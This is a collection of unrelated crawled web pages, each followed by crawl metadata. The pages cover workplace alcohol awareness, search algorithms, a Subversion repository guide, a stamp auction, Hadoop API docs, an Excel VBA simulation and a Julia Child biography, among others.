UK will experience a mental health problem each year? The relationship between alcohol and mental health is complex. In fact, alcohol is regarded as ‘the UK’s favourite coping mechanism’, with many drinking to cope with stress, anxiety, depression or other mental health problems. Some call this ‘self-medicating’ with alcohol. While alcohol can initially relax us and give us a feeling of euphoria, these feelings are short-lived, and the long-term effects of drinking over a prolonged period can be quite harmful: - Drinking too much alcohol can worsen symptoms of many mental health problems. In particular, it can lead to low mood and anxiety. - When the immediate calm after drinking fades, some may feel worse than before. - Post-drinking hangovers can be especially difficult, causing headaches, nausea, and depression. - Using alcohol in this way can mean that the underlying mental health problems go unaddressed. Considering this, you should ensure your employee is aware of the top three methods for preventing alcohol problems: - Employee assistance programme - Access to occupational health programme - Access to/signposting to mental health support If none are available, you may want to refer your employee to a doctor for assessment. An online GP service like HealthHero’s provides fast and convenient access to practising doctors who can provide direct support and advice to your employees. Additionally, we offer online clinically proven counselling and psychological interventions. 5. Don’t encourage a drinking culture How many of your work social events take place at pubs or bars? 43 percent of working adults agree that there is too much pressure to drink when socialising with colleagues. In fact, those in the private sector are 3.6 times more likely to feel pressured by their managers. There is no doubt that certain aspects of company culture can influence perceptions about alcohol consumption. So, you should adjust these to reflect the company culture you want to create and that they are evident in your policies. According to the CIPD, 25 percent of employees say that some people don’t go to social events because of the expectation to drink alcohol. Thus, drinks free events for employees to connect goes beyond being practical. As well as reducing the tendency to meet over a drink, it can align with diversity strategies. For instance, HR could aim to arrange a monthly alcohol free event. Not just for employee wellbeing but also to respect their cultural choices and preferences. A few suggestions include: - Moving client meetings away from drinking and ‘happy hour’ to ‘networking’. - Offering non-alcoholic options and limiting the amount of alcohol your company provides. - Organising social events without alcohol (this may deter staff from attending, so promote the events to avoid the company culture revolving around alcohol). 6. Make support a priority in your policies Go beyond simply improving alcohol education in the workplace. Do your policies prioritise workplace support? Employees will appreciate the fact that your company is supportive of them. To ensure an effective policy, focus on the following key areas to support alcohol misuse: - Holistic culture: Promote a workplace culture that values holistic employee health and wellbeing through support outlined earlier. - Preventative services: Ensure that all preventative measures are covered by your health and benefits plan. - Alcohol Awareness Programme. To reduce the impact of alcohol-related harm, develop a robust alcohol awareness workplace program. This could include: - Precise written policies and procedures that define employee and employer responsibilities. - Education and resources for employees and managers. - Employee benefits such as healthcare coverage, employee assistance and flexible sick time. - Support to reintegrate employees during recovery. 7. Host a practical workshop As we’ve established, many people don’t realise the harmful effects of alcohol on their health and wellbeing. Hosting alcohol aware workshops, such as sessions on everything employees need to know, can: - Promote alcohol awareness - Facilitate a responsible culture - Build healthy coping strategies On top of this, expert-led workshops can also positively impact your business. Improving the coping strategies of your employees leads to: - Fewer sick days and reduced staff turnover. - Increase employee productivity - A happier and healthier workforce. As mentioned earlier, there are training sessions available. Which workshops you host will depend on your size and budget. That said, make sure any workshop you choose acknowledges the importance of the body and mind. After all, it’s not just decreasing alcohol intake and tracking units that can reduce health risks. Exercise, eating well, and getting plenty of sleep are also essential. 8. Signpost to helpful resources If you are concerned that an employee has a drinking problem, external help is available. They can find some useful phone numbers and links here for free and confidential advice. Drinkaware is a charity which aims to reduce alcohol-related harm by helping people make better choices. Helpline: 0300 123 1110 Free online chat service for anyone who is looking for information or advice about their own, or someone else’s, drinking. Drinkaware trained advisors are on hand to give you confidential advice. UK-wide treatment agency, helping individuals, families and communities to manage the effects of drug and alcohol misuse. If you are over 50 and have concerns about your drinking, call the helpline. Helpline: 0808 801 0750 AA supports the recovery and continued sobriety of individuals. Meetings are available online and in person. Helpline: 0800 917 7650 Al-Anon in the UK and Republic of Ireland offers support to families and friends affected by someone else’s drinking. Helpline: 0800 008 6811 Information, advice and local support services for families affected by alcohol and drugs. Helpline: 07442 137 421 or 07552 986 887. Alcohol awareness: it’s time to act now ‘It’s more important than ever for organisations to be aware of alcohol misuse and to signpost their staff to appropriate support. Organisations are in a strong position to engage with their staff about alcohol awareness, and now is the time to prioritise employee health and wellbeing.’ – Drinkaware You can use alcohol awareness as an opportunity to review your substance misuse policies, evaluate your wellness strategy, and support your employees. Nonetheless, with workplace pressures contributing to increased alcohol consumption, your business must do more. Without effective preventative measures, your employees’ wellbeing, physical health, and productivity will suffer. Start small by educating employees on the signs of alcohol dependence through e-learning. Then introduce a comprehensive substance abuse prevention programme to bring about real, tangible change. Alternatively, you might consider investing in a virtual healthcare service that combines physical health with mental health. Whatever action you take, put your workers’ health first. Are you looking to educate your employees about the impact of alcohol? Do you want to support those harmed by it? Learn how to raise awareness and explore the link with mental health by joining Drinkaware experts in our webinar where you’ll learn how to provide support and expert resources.
<urn:uuid:9d932cc6-c62a-4e1e-a667-b65277496866>
CC-MAIN-2022-33
https://www.healthhero.com/blog/alcohol-awareness-8-ways-businesses-can-support-employees?hsLang=en
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571982.99/warc/CC-MAIN-20220813172349-20220813202349-00072.warc.gz
en
0.93809
2,345
1.96875
2
Welcome to corvusfugit.com!Corvus fugit means "the crow flies." Join 572 other followers Recent Top Posts - Great Britain - New York City - Science Fiction - Ships & Sailing - The Sky Tag Archives: Latino/as/x cho Kcho: Obras Escogidas (Selected Works) (1994) (source) For their 2009 piece Do You Remember When?, the indigenous arts collective Postcommodity cut through the floor of the Arizona State University Art Museum, exposing the earth below. A recording of a Pee Posh social dance song played in the … Continue reading Leonardo da Vinci: Lady with an Ermine [Cecilia Galleran] (1489–1490) Awol Erizku: Lady with a Pitbull (2009) Hans Holbein: Portrait of a Lady with a Squirrel and a Starling [probably Anne Lovell] (c. 1526-28) Frida Khalo: Self-Portrait with … Continue reading Max Yavno: East Los Angeles, 1946 (source) “Helen Martinez and her children (her grandchild was too young to picket) wear placards announcing that Tex-Son workers are on strike.” (source) Klimbin (colorizer): Emiliano Zapata (source) Butch Locsin aka The Skeleton of Color Gallery here.
<urn:uuid:25096b1b-8482-40ed-b671-2bebd609fd9f>
CC-MAIN-2022-33
https://corvusfugit.com/tag/latino-as-x/page/2/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570793.14/warc/CC-MAIN-20220808092125-20220808122125-00673.warc.gz
en
0.800569
471
1.953125
2
The first systematic study of the Aristotelian theory of anagnorisis in 16c Spanish drama.Anagnorisis - `recognition' or `discovery' - is a key element of Aristotelian literary theory. This book is the first systematic study of its presence in Spanish drama of the sixteenth century, a period in which Aristotelian theory was widely disseminated. Professor Garrido begins by examining the theory of anagnorisis developed by Aristotle and his sixteenth-century commentators. She then analyses its use in a large corpus of Spanish plays from the period 1515-87. Her survey is divided into two parts, corresponding to the years before and after the appearance, in 1548, of Robortello's commentary, which expanded and developed Aristotle's definition of anagnorisis. In earlier decades its use is largely confined to humanistic plays, which seek to allow the recognition to arise naturally from the plot; plays from the second half of the century tend to model their use of anagnorisis on Plautus's Menaechmi and regularly resort to a deus ex machina to bring about the recognition. PATRICIA GARRIDO CAMACHO is Professor of Spanish at the University of Montana. BISAC LIT004280, LIT006000, PER011020 - RECOMMEND TO LIBRARY - COURSE ADOPTION - MEDIA ENQUIRIES - ORDERING eBOOKS - OTHER ORDERING OPTIONS - RIGHTS AND PERMISSIONS ...el estudio de Garrido se alínea a la reinvidicación de la anagnórisis no solo porque lee los dramas de acuerdo a las teorías poéticas. Se trata, asimismo, de una visión panorámica del teatro del XVI que now permite gozar nuestro propio shock al reconocer la gran aportación de la anagnórisis. IBEROAMERICANA, I, 4 (2001)
<urn:uuid:b807ab5d-adfa-4ef7-8659-f9e3d680273a>
CC-MAIN-2017-04
https://boydellandbrewer.com/el-tema-del-reconocimiento-en-el-teatro-espa-241-ol-del-siglo-xvi-hb.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00302-ip-10-171-10-70.ec2.internal.warc.gz
en
0.743128
441
3.09375
3
12 Unexpected Things That Exist Because Of Linux Published 8:06 am, Saturday, July 13, 2013 It feels like Linux doesn't get enough love. Apple's OS X and Microsoft's Windows operating systems are always in the spotlight, but the free and open-source Linux quietly churns away to power a surprising number of everyday or unusual items. Jim Zemlin, executive director of the Linux Foundation, told us, "You use Linux every day but you don't know it. It's such a fundamental part of our lives. "It runs air traffic control, it runs your bank, and it runs nuclear submarines. Your life, money, and death is in Linux's hands, so we can keep you alive, clean you out, or kill you. It's incredible how important it is. "The world without Linux might be a very different place. It's one where computing is kind of crappy and homogeneous. You're still using Windows CE on your crappy Windows cell phone. That world is grim and dark and Linux is a reason why that world doesn't exist." We've gathered 12 examples that prove Zemlin's statements are no exaggeration – for such an oft-forgotten operating system, you rely on Linux far more than you realize. Android phones and tablets got their start in Linux. The hugely popular mobile operating system is uses Linux as its foundation, and with hundreds of thousands of Android devices activated each day, it stays relevant. Your TiVo is powered by Linux! Linux powers a majority of the world's supercomputers. See the rest of the story at Business Insider
<urn:uuid:e4327b3a-92f7-4461-bdfc-3b41531453a7>
CC-MAIN-2016-44
http://www.timesunion.com/technology/businessinsider/article/12-Unexpected-Things-That-Exist-Because-Of-Linux-4663470.php
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988718278.43/warc/CC-MAIN-20161020183838-00239-ip-10-171-6-4.ec2.internal.warc.gz
en
0.931838
335
2.15625
2
Comparing: M4A2E4 Sherman vs. Matilda IV vs. Type 3 Chi-Nu Work on this experimental vehicle started in March 1943. Two prototypes were built by July. The vehicle passed trials, but was never mass-produced or used in action. A British tank supplied to the U.S.S.R. under Lend-Lease. A total of 1,084 vehicles were sent to the Soviet Union, with some lost at sea during transport to Murmansk. The Type 3 Chi-Nu medium tank is a modification of the Тype 1 Chi-He with a new turret and gun. The tank was the most powerful among wartime Japanese mass-produced vehicles. However, only 60 vehicles were manufactured due to shortages of components and materials. |Tank data page||Tank data page||Tank data page||Tank data page| |Battle Tiers||5 6||5 6||5 6 7| |Speed Limit||52 km/h||25 km/h||38.8 km/h| |Speed Limit Back||18 km/h||10 km/h||16 km/h| |Horse power / weight| |Max Climb Angle| |Hard terrain resistance| |Medium terrain resistance| |Soft terrain resistance| |Damage (Explosion radius)| |Damage / min| |Rate of Fire| |Stationary||12.50 %||15.00 %||%| |In motion||10.00 %||10.00 %||%| |When Firing||3.25 %||3.88 %||%| |Accuracy||61.2672 %||66.7624 %||%| |Neto Credits Income||5072.19||6022.26| |Winrate||54.1623 %||54.7138 %||%| |Kills per Battle||0.831915||0.916629| |More stats @ vbaddict.net||More stats||More stats||More stats|
<urn:uuid:58f6b7f1-b273-40c8-a870-072c33e5048a>
CC-MAIN-2017-04
http://tank-compare.com/en/compare/m4a2e4-sherman/matilda-iv/type-3-chi-nu
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00306-ip-10-171-10-70.ec2.internal.warc.gz
en
0.665859
441
2.625
3
A search algorithm is a unique formula that a search engine uses to retrieve specific information stored within a data structure and determine the significance of a web page and its content. Search algorithms are unique to their search engine and determine search engine result rankings of web pages. Common Types of Search Algorithms Search engines use specific algorithms based on their data size and structure to produce a return value. Linear Search Algorithm Linear search algorithms are considered to be the most basic of all search algorithms as they require a minimal amount of code to implement. Also known as a sequential search, linear search algorithms are the simplest formula for search algorithms to use . Linear search algorithms are best for short lists that are unordered and unsorted. To find what is being searched for, the algorithm looks at the items as a list. Once it gets to the item being searched, the search is finished. Linear search is not a common way to search as it is a fairly inefficient algorithm compared to other available search algorithms. Simple Example of Linear Search Algorithm: Let’s say that you are meeting your friend, Stephanie, tonight at the movies for new movie premier. She offers to get your ticket and wait in line for the theatre to grab good seats. Once you arrive at the theater, you notice the line is long and you have no idea where your friend is in the line. However, you know what Stephanie looks like so on your way in you start at the end of the line and scan each person's face looking for your friend. Once you find her, you get in line next to her. You just followed a linear search algorithm. The line is long and the people are unordered, so the best way to find who you’re looking for is to scan the line from one end to the other. Binary Search Algorithm A binary search algorithm, unlike linear search algorithms, exploits the ordering of a list. This algorithm is the best choice when alist has terms occurring in order of increasing size. The algorithm starts in the middle of the list. If the target is lower than the middle point, then it eliminates the upper half of the list; if the target is higher than the middle point, then it cuts out the lower half of the list. For larger databases, binary search algorithms will produce much faster results than linear search algorithms. Binary Search uses a loop or recursion to divide the search space in half after making a comparison. Binary search algorithms are made up of three main sections to determine which half of the lists to eliminate and how to scan through the remainder of the list. Pre-Processing will sort the collection if it is not already in order. Binary Search uses a loop or recursion to divide the search space in half after making a comparison. Post-Processing determines which variable candidates remain in the search space. Simple Example of Binary Search Algorithm: You are searching for your favorite blue sweater in your walk-in closet. You’ve color coordinated your clothing from right to left based on the standard ROYGBIV color theory. You open the door and go straight to the middle of your closet, where your green clothing is located and automatically you’ve eliminated the first half of options, since they are not close to the color options that you are looking for. Once you’ve eliminated half of your options, you realize, your selection of blue clothing is large and makes up the majority of the second half of clothing options, so you go to the middle of the blue/indigo section. You can eliminate the indigo and violet colors. From there, all you have left is green and blue and you’re able to select your favorite blue sweater from the remainder of clothing. By eliminating your clothing options in halves, you are able to cut your search time in half to narrow in on your favorite blue sweater. How Search Algorithms Impact Search Engine Optimization Search algorithms help determine the ranking of a web page at the end of the search when the results are listed. Each search engine uses a specific set of rules to help determine if a web page is real or spam and if the content and data within the page is going to be of interest to the user. The results of this process ultimately determine a site’s ranking on the search engine results page. While each set of rules and algorithm formulas vary, search engines use relevancy, individual factors and off-page factors to determine page ranking in search results. Search engines search through web page content and text looking for keywords and their location on the website. If keywords are found in the title of the page, headline and first couple of sentences on the page of a site, then that page will rank better for that keyword than other sites. Search engines can scan to see how keywords are used in the text of a page and will determine if the page is relevant to what you’re searching for. The frequency of the keywords you’re searching for will affect the relevancy of asite. If keywords are stuffed into a site’s text and it doesn’t naturally flow, search engines will flag this as keyword stuffing. Keyword stuffing reduces a site’s relevancy and hurts the page’s ranking in search engine results. Since search algorithms are specific to search engines, individual factors come from each search engine’s ability to use their own set of rules for search algorithm application. Search engines have different sets of rules for how they search and crawl through sites; for adding a penalty to sites for keyword spamming; and for how many sites they index. As a result, if you search for “home decor” on Google and then again on Bing, you will see two different pages of results. Google indexes more pages than Bing - and more frequently - and, as a result, will show a different set of results for search inquiries. Off- page factors that help search engines determine a page’s rank include things like hyperlinking and click-through measurement. Click-through measurements can help a search engine determine how many people are visiting a site, if they immediately bounce off the site, how long they spend on a site and what they search for. Poor off-page factors can lower asite’s relevancy and SEO ranking so it’s important to consider these items and work to improve them if necessary. Once you have a better understanding of how search algorithms work, their role in search engine optimization and site rankings then you can make the necessary adjustments to a site to improve its’ ranking. At Volusion, our team of Search Engine Optimization (SEO) specialist can help you make adjustments and set up your site so that it is properly optimized for search engines. Contact us today and let us help you get started on your sites SEO! Ready to take your ecommerce SEO to the next level? Learn how Volusion can help you increase traffic and sales for your store!
<urn:uuid:66a92245-a600-448c-820c-ed5eb6b17080>
CC-MAIN-2022-33
https://www.volusion.com/blog/search-algorithms/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572161.46/warc/CC-MAIN-20220815054743-20220815084743-00469.warc.gz
en
0.905855
1,445
4.09375
4
Cherrystone Auctions Introduces Online Gallery Of Rarities Interested website visitors can view pictures and details of the auctioneer’s rarest stamps Cherrystone Auctions has opened a“Gallery of Rarities” section of their website where stamp enthusiasts can view information about the rarest and most valuable stamps sold by the New York City auction house. The gallery includes nearly 400 rare stamps sold through Cherrystone over the years. Visitors to the Gallery of Rarities are able to click on a specific stamp and view an enlarged image. Detailed information accompanies each stamp in the gallery, including the year it was released, the year it was sold and the price it realized at auction. Users of the interactive gallery are able to sort through the collection of rare stamps from around the world by country of origin or by price realized. The Gallery of Rarities includes stamps and stamp-related collectibles from the United States, Russia, Canada, China, Italy, Iceland and other countries. Sorting the stamps by the price they realized at auction reveals that the highest-price item in the Gallery is a complete pane of 25 Russian stamps released in 1924 and sold in a Cherrystone auction in June of 2008 for $805,000.00. The highest-priced American stamp in the Gallery—a 24-cent stamp from 1918—was auctioned off by Cherrystone in December of 2010 for $345,000.00. Cherrystone notes on their website that there may be many stamps that look similar to those in their Gallery of Rarities. Often times, the auction house explains, the very subtle differences between rare stamps and common stamps can be determined only by experts. Cherrystone Auction’s Gallery of Rarities, https://www.cherrystoneauctions.com/gallery.asp , is found on their website, listed below, under the “About” section at the top of the page. Cherrystone Auctions was originally founded as a retail store in 1967. Since then, it has evolved for over 49 years into one of the world’s leading auctioneers of rare stamps and philatelic material. Located in the heart of New York City, Cherrystone is a member of all major United States and European Philatelic Societies, among them are ASDA, APS, U.S. Philatelic Classics Society and Collectors Club of New York. The auction house brings over $30 million worth of stamps and postal-related collectibles to market each year. Their auctions, held on a consistent basis several times per year, feature stamps from around the world of particular rarity and quality. In addition to auctions, Cherrystone occasionally holds “Specialty” sales, often the award-winning collections of single owners. Among these famous collections auctioned off by Cherrystone were the Garfield Collection of United States Postal Stationery, the Andrew Cronin Collection of Worldwide Postal History and the S. Shtern Collection of the Soviet Union. Cherrystone’s leadership staff includes Paul Buchsbayew as President and Joshua Buchsbayew as Vice President. The leaders credit the auction house’s success to a combination of decades of experience in the business and personal passion for stamps. Paul is a member of the A.I.E.P. (Association Internationale des Experts Philatelie) and an expert in Russian material while Joshua’s primary interest is in United States Classics. Parties interested in selling their collections through Cherrystone or who have questions about how to purchase from the auction house are encouraged to contact Paul or Joshua directly. More information about Cherrystone Auctions and its upcoming auction on August 9th and 10th is available on their website. Cherrystone Auctions, Inc. Address: 119 West 57th Street, Suite 316, New York, NY 10019 Toll Free: 800.886.9313 Bids Email: email@example.com
<urn:uuid:ca3cb379-1fbd-4d9c-bb44-3ceff2eb2927>
CC-MAIN-2017-04
http://newsbox.prnews.io/10235-Cherrystone-Auctions-Introduces-Online-Gallery-Of-Rarities.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284411.66/warc/CC-MAIN-20170116095124-00455-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944625
819
1.546875
2
When setting up Subversion within an organization, folks will often ask “How many repositories should I create?”—my advice is to just create one repository until you have a concrete need for more. I take this approach because it’s easy to split an existing repository into two. I also remind people it’s not the end of the world if they create multiple repositories and then they need to merge them, because Subversion has good support for splitting, merging, and reorganizing repositories. I’ve never really gone into any detail on how you actually do this stuff, but since I recently needed to merge two repositories I thought I’d share the technique I used. Splitting a repository First off make sure you tell everyone you’re going to split the repository. The ideal situation is where everyone can check in, go home for the night, leave you to organize stuff, and then come in the next day and start on something fresh. If people can’t commit all their changes you may need to help them relocate their working copy. Once everyone’s committed their changes, close down network access to your repository to be sure no-one’s committing further changes. This might be overkill depending on your situation, but it’s nice to be safe. Next, back up your repository using svnadmin dump to create a dump file. A dump file is a portable representation of a Subversion repository and something you might be using for backups already. We’re going to load the dump file into a new repository, using svndumpfilter to select just the directories we wish to move to the new repository. A typical transcript might look like this: [mgm@penguin temp]$ svnadmin dump /home/svnroot/log4rss > log4rss.dump * Dumped revision 0. * Dumped revision 1. : : : * Dumped revision 37. * Dumped revision 38. [mgm@penguin temp]$ mkdir tools-repos [mgm@penguin temp]$ svnadmin create tools-repos [mgm@penguin temp]$ cat log4rss.dump | svndumpfilter include log4rss/trunk/tools | svnadmin load tools-repos Including prefixes: '/log4rss/trunk/tools' Revision 0 committed as 0. Revision 1 committed as 1. Revision 2 committed as 2. : : : <<< Started new transaction, based on original revision 38 ------- Committed revision 38 >>> In the above sample, I dumped the Log4rss repository into a file called log4rss.dump and created a new directory called tools-repos initialized with an empty repository. Then I piped my dump file through svndumpfilter and told it to include just the tools directory, and piped the result of the filter into svnadmin load into the new repository. I haven’t included it here, but I got a bunch of information about which items were included in the filter and which were dropped. Now the new tools-repos repository contains just the tools directory. At this point, I can make the new repository available and tell developers where to find it. It’s probably also wise to delete the log4rss/trunk/tools directory from the original repository, just so people can’t accidentally use the old stuff. Subversion doesn’t have an obliterate command so the tools directory is still using space in the old repository—if this is an issue you’ll need to consider loading your dump file into a new repository using an “exclude” command to weed out the directory you no longer want. Merging two repositories My current project recently moved from Chicago to Calgary. For a while we had two teams running, using separate Subversion repositories. When everything moved to Calgary, we needed to merge the Chicago team’s code into our repository. We didn’t want to just import the files, we wanted to include historical information too. We created a dump file of the Chicago team’s repository and loaded it straight into our repository using svnadmin load. This worked because the load command simply replays a series of commits, simulating what would have happened if the Chicago team had been working with us all along. The key thing to note here is that we had been using different directory paths in the two repositories, so their stuff didn’t conflict with ours. If they had used the same directory structure we would not have been able to simply load their changes into our repository. In that case, we would have had to work some magic with the dump file—it contains plain-text path definitions, so in a pinch we could have munged those path names so they didn’t conflict. Organizing a repository Once we’d loaded the Chicago code into our repository we used TortoiseSVN’s graphical repository browser to move the new stuff into our existing directory tree. Here’s a screenshot of the repo browser—it’s a great tool for this kind of thing and made reorganization very simple. We just used the “rename” command to move everything around in the repository, and once done we all checked out the newly organized directory tree and continued working.
<urn:uuid:8bffd72c-be4e-4aea-83aa-a45e4d184c5b>
CC-MAIN-2017-04
http://mikemason.ca/blog/2005/10/splitting-merging-and-organizing-a-subversion-repository/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00381-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919932
1,120
1.773438
2
When we were little kids, we got a lot of different commands from our parents. “Baby steps,” as how they called it. We were told to “Walk!” while they were supporting our hips, to “Close-open!” our hands, and to play “Peeak-a-boo!” by putting our hands over our eyes and then removing them, as though trying to scare them but ended up looking like a cute, little monster, among many others. Our parents, of course, made all the decisions for us then. It was their decision whether we would eat breakfast, whether we would take a bath, or whether we would go to school. Basically, we grew up in the concept of having to follow orders from our parents for us to grow, step by step. But we are not always kids. We eventually grow up and our thinking skills develop. It is then when we already become aware about the many forces surrounding us that may or may not affect the decisions that we make for ourselves. As we grow older, it becomes harder and harder for us to make decisions because of so many possible choices laid out in front of us. There are people whose being dependent to their parents’ decisions still matter a lot, and there are some who have already become matured enough to make decisions for themselves. Thus, not all people enjoy making decisions when, in fact, it has to be done by each and every one of us in order to live a life where regrets are absent. So how do we find our own voice? Fortunately, there are two easy steps we could follow: 1. Check if you are hearing yourself clearly. In order for you to make decisions for yourself, you have to make sure that you are hearing what your intuition is saying. Hearing, after all, is a prerequisite to listening. And listening to yourself, let alone hearing yourself, is very important for you when you are making decisions. Sure, people around you would always have something to comment on whatever it is that you are thinking or going through, but never allow your own reasoning to be buried by theirs. 2. Listen to theirs, but follow only yours. Hearing other people’s comments on matters is just about inevitable. In every decision-making situation, they will always be there whether you like it or not. You can opt to listen to them, but make sure that at the end of the day, your decision is still the one that would weigh more. Hearing and listening to yourself do not just help you to know your decisions because they also assist you in actually making decisions—from the pettiest (“What pair of shoes will I wear today?”) to the life-changing (“What career path should I take?”). That’s how crucial it is for you to know how to hear and listen to your own intuition. Always remember that you can listen to what others are saying, but never forget to follow what your heart’s desires are.
<urn:uuid:9cd7e676-3ae8-4497-bb52-8bb0824dcd68>
CC-MAIN-2022-33
https://meditationtechniques.co/2-ways-find-inner-voice/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573876.92/warc/CC-MAIN-20220820012448-20220820042448-00064.warc.gz
en
0.981744
630
2.53125
3
Join Curt Frye for an in-depth discussion in this video Running the simulation with added station capacity, part of Process Modeling in Excel Using VBA. - [Voiceover] In the previous movie, we added code to our simulation to allow individual stations to handle multiple customers at a time. We indicated the number of customers that a particular station could handle by adding the capacity property and also indicating the capacities here. And we use VBA code to read those values into the properties. And the idea is to see how increase in capacity at the two stations with the largest average processing time would affect idle time within the simulation. I've set the mean to 15, so in other words, on average, we would expect a customer to arrive every 15 tics of the clock. Now we can see how those values will change based on our simulation. With that background in place I'll press Alt + F11 to move to the Visual Basic editor. I'm in Module 2, which has a subroutine called Additional Capacity, and what I want to do is run it to see what the idle time looks like within the system. So this is the code we created last time, so I'll just go ahead and press F5. The simulation runs and I'll press Alt + F11 to go back to the workbook. I am now on the results worksheet, and if I scroll down I can see that I have very low idle times. I have a one and nine, a ten, here I have a 20 and a 24, and 14s and so on, but a lot of zeros and other small values. So it's very encouraging. It tells me that both the idle times are going down and of course, the percentage of time that a customer spends within the process is going down as well. But now let's see how sensitive these results are to changing the mean time. So I'll delete my current results. So I"ll got to the name box and type A2 then a colon and then F is idle time, and I'll just delete down to 300 even though I know I didn't have 300 customers. And when I pressed enter those cells were selected. Delete and Ctrl + Home to release the overall selection and go back to cell A1. So I'll go back to the sims set up, worksheet and I will click inside cell J2, and edit that value to 10. So I now have a mean arrive time of 10, and if I scroll down my list of lookup values I can see that I get a one at 35. So the largest arrive time that I could possibly get between customer is 35 tics of the clock. But that is extremely unlikely to happen and as you can see from the probabilities here. So I'll go ahead and scroll back up. There's our mean and now I can press Alt + F11 to go to the Visual Basic editor. Cursor still in the subroutine, so I'll press F5. And because we're adding more customers the simulation take a little bit more longer to run. Not too bad though. And then I'll press Alt + F11 and here we are on the result sheet. And you can see already that the idle times are significantly higher, so we have our customers entering the system at smaller intervals than we had before, and as I scroll down, I can see that the idle times, instead of being a bunch of zeros, we now have quite a few in the 20s and 30s. So scrolling back up. So you can see that as you expected changing the arrival mean time will certainly increase the strain on the system leaving two people standing around and more idle time overall. - Creating a class module in VBA - Defining class properties - Creating collections - Describing process flow and programming goals - Creating loops - Increasing capacity of a model - Running simulations - Analyzing simulation results
<urn:uuid:cb1853be-da02-4b23-b82a-96ea65dbb942>
CC-MAIN-2017-04
https://www.lynda.com/Excel-tutorials/Running-simulation-added-station-capacity/431059/476976-4.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00244-ip-10-171-10-70.ec2.internal.warc.gz
en
0.959907
808
2.625
3
NumbersMax 12 per grid EquipmentCones, Tag Belts - In a 20m x 30m Grid (Diagram not to scale), Nominate 2 catchers to work as a pair (holding hands) - Remaining players attempt to run to opposite side of grid without being Tagged - If players are successfully Tagged then they join hands with the catchers, the chain will become longer as more people are caught. However the coach may decide that chains may contain a maximum of 5 players and more than one chain may be working at the same time. - Defensive chain(s) are to work as a team and catch the remaining runners - Run Activity for 2 mins and Rotate catchers - Defenders to identify free runners - Scan - Heads Up - Communicate - Increase catchers chain to gain more success Variation / Progression Change the size of the grid This resource has been tagged...
<urn:uuid:265c7aa5-2331-41ca-bcae-62bbb7d8d48e>
CC-MAIN-2022-33
https://www.wrugamelocker.wales/en/resources-and-videos/resources/tag-rugby-u7-u8/defence/chain-tag/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573908.30/warc/CC-MAIN-20220820043108-20220820073108-00275.warc.gz
en
0.936677
205
1.835938
2
The influence of improvisation activities on speaking confidence of EFL student teachers Peer reviewed, Journal article MetadataVis full innførsel OriginalversjonNordisk tidsskrift for utdanning og praksis. 2020, 14 (2), 82-102. 10.23865/up.v14.1879 The purpose of the present study was to explore the application of improvisation activities in English teacher education, specifically to investigate their influence on the student teachers’ confidence when speaking English spontaneously. The improvisation activities consisted of storytelling, conversations and status expressions. Data were drawn from both pre- and post-questionnaires and retrospective texts. The statistical findings showed significant improvements in the student teachers’ level of speaking confidence and degree of relaxation while speaking English. The findings of the qualitative analysis confirmed this, and participants stated that the fun, collaboration and high degree of engagement had helped to increase their speaking confidence. The combination of the findings indicated that the improvisation activities had been a valuable method for increasing the speaking confidence of the EFL student teachers. The pedagogical implication is that teacher educators should consider including improvisation activities in their EFL courses.
<urn:uuid:1d3c6af4-7263-41af-b19c-a206dd3ad572>
CC-MAIN-2022-33
https://ntnuopen.ntnu.no/ntnu-xmlui/handle/11250/2680251
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571222.74/warc/CC-MAIN-20220810222056-20220811012056-00665.warc.gz
en
0.925523
280
2.640625
3
@InterfaceAudience.Public @InterfaceStability.Stable public interface Partitioner<K2,V2> extends JobConfigurable Partitioner controls the partitioning of the keys of the intermediate map-outputs. The key (or a subset of the key) is used to derive the partition, typically by a hash function. The total number of partitions is the same as the number of reduce tasks for the job. Hence this controls which of the m reduce tasks the intermediate key (and hence the record) is sent for reduction. |Modifier and Type||Method and Description| Get the paritition number for a given key (hence record) given the total number of partitions i.e. int getPartition(K2 key, V2 value, int numPartitions) Typically a hash function on a all or a subset of the key. key- the key to be paritioned. value- the entry value. numPartitions- the total number of partitions. Copyright © 2016 Apache Software Foundation. All rights reserved.
<urn:uuid:fe90dfc5-df83-4627-a538-d80ccc8a106d>
CC-MAIN-2017-04
http://hadoop.apache.org/docs/stable/api/org/apache/hadoop/mapred/Partitioner.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00530-ip-10-171-10-70.ec2.internal.warc.gz
en
0.76152
231
1.53125
2
By filmmaker Marilyn Mellowes, director of American Masters: Julia Child! America’s Favorite Chef. Scooping up a potato pancake, patting chickens, coaxing a reluctant soufflé, or rescuing a curdled sauce, Julia Child was never afraid of making mistakes. “Remember, if you are alone in the kitchen, who is going to see you?” she reassured her television audience. Catapulted to fame as the host of the series The French Chef, Julia was an unlikely star. Over 6′ 2″, middle aged and not conventionally pretty, Julia had a voice careened effortlessly over an octave and could make an aspic shimmy. She was prone to say things like “Horray” and “Yum, yum.” Her early culinary attempts had been near disasters, but once she learned to cook, her passion for cooking and her devotion to teaching, brought her into the hearts of millions and ultimately made her an American icon. To the fans who knew and loved her, she was known simply as Joooolia. Born in 1912 in Pasadena, California, she led a life of ease and privilege. She graduated from Smith College with vague aspirations of becoming a writer, but never found a focus. She confided in her diary: “I am sadly an ordinary person… with talents I do not use.” Yet she continued to yearn for adventure and the chance to escape from her comfortable upper middle class existence. She found that chance in the aftermath of Pearl Harbor. Like many Americans her age, she hurried to Washington to work for the war effort, finding a job at the Office of Strategic Services (OSS). Eventually she volunteered to 